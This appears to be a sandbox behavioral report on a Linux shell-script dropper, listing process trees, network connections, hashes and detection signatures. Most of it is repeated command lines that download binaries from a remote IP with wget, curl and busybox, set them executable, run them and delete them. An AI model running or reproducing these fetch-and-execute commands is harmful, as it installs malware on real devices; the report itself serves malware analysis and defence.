/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.39:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:20

Reported

2024-10-25 01:22

Platform

debian9-armhf-20240611-en

Max time kernel

20s

Max time network

21s

Command Line

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A

Processes

/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

